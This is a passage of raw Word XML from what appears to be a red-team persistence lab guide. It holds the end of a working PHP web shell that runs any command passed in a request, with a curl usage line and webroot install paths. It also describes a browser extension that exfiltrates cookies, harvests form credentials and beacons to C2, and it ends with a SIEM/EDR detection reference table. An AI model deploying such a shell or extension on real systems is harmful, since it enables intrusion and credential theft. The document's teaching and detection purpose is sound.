          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$c = $_POST['cmd'] ?? $_GET['cmd'] ?? '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if($c) { exec($c . ' 2&gt;&amp;1', $o); echo implode("\n", $o); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Usage with curl:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H "X-PT-Token: PT_Lab_2025" -d "cmd=id" http://target/system_check.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Default install paths:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux:   /var/www/html/system_check.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows: C:\inetpub\wwwroot\system_check.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Platform: Browser Extension (T1176)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Generates a complete Chrome/Firefox Manifest v3 extension with permissions for all URLs, tabs, cookies, history, and webRequest interception. Includes a background service worker that beacons to C2 every 30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">manifest.json — declares permissions: tabs, cookies, history, webRequest, scripting, &lt;all_urls&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">background.js — service worker: cookie exfil, history capture, form harvesting, C2 beacon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Content script injection — harvests form submissions (credentials) from all pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation: Chrome developer mode → Load Unpacked, or via enterprise GPO ExtensionInstallForcelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Detection Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM and EDR Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every technique execution notes its specific IOCs and detection events in the terminal output. The table below summarizes the primary detection data sources across all techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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5760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Event / Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Covers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EID 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RegistryEvent (Value Set)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Run keys, Winlogon, SSP, Logon Script, COM, File Assoc, Active Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EID 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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FileCreate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Startup folder, LNK files, web shell drops, extension files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Process Create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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schtasks.exe, sc.exe, reg.exe, wmic.exe, net.exe command lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EID 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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ImageLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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DLL hijacking (path anomaly), SSP (lsass DLL load), Winlogon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon EID 19/20/21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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WMI Filter/Consumer/Binding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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WMI permanent event subscription — all three events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Event 7045</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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New Service Installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Service creation — check binary path for temp/appdata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Event 4698</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Scheduled Task Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Task creation — check action command and trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Event 4720/4728</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Account Created / Group Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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New local account and admin group membership</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Event 4611</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Trusted Logon Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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SSP/AP DLL registration in LSASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">auditd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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File write events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Cron paths, systemd unit dirs, ~/.bashrc, authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">File Integrity (FIM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Baseline delta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Startup folder, Task XML, cron files, shell profiles, webroot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autoruns.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Everything</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Comprehensive Windows persistence — compare to baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl list-units</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Enabled services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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New enabled service not in provisioning baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">crontab -l / /etc/cron.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cron entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Unexpected schedule entries or curl|bash patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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bCs/>
                <w:color w:val="00695C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cat ~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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SSH key audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">New pubkey entries outside provisioning window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Detection Tooling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon (Microsoft Sysinternals) — provides EID 1/7/11/12/13/19/20/21 across all Windows techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Autoruns.exe — gold standard for Windows persistence enumeration — compare against baseline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd (Linux) — syscall-level file write, exec, and network event auditing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OSSEC/Wazuh — file integrity monitoring on critical paths (cron, systemd, webroot, ~/.ssh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Elastic SIEM / Splunk — detection rules for WMI, service creation, task creation, account events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rkhunter / chkrootkit — Linux rootkit and LKM detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">KnockKnock / BlockBlock — macOS persistence detection tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
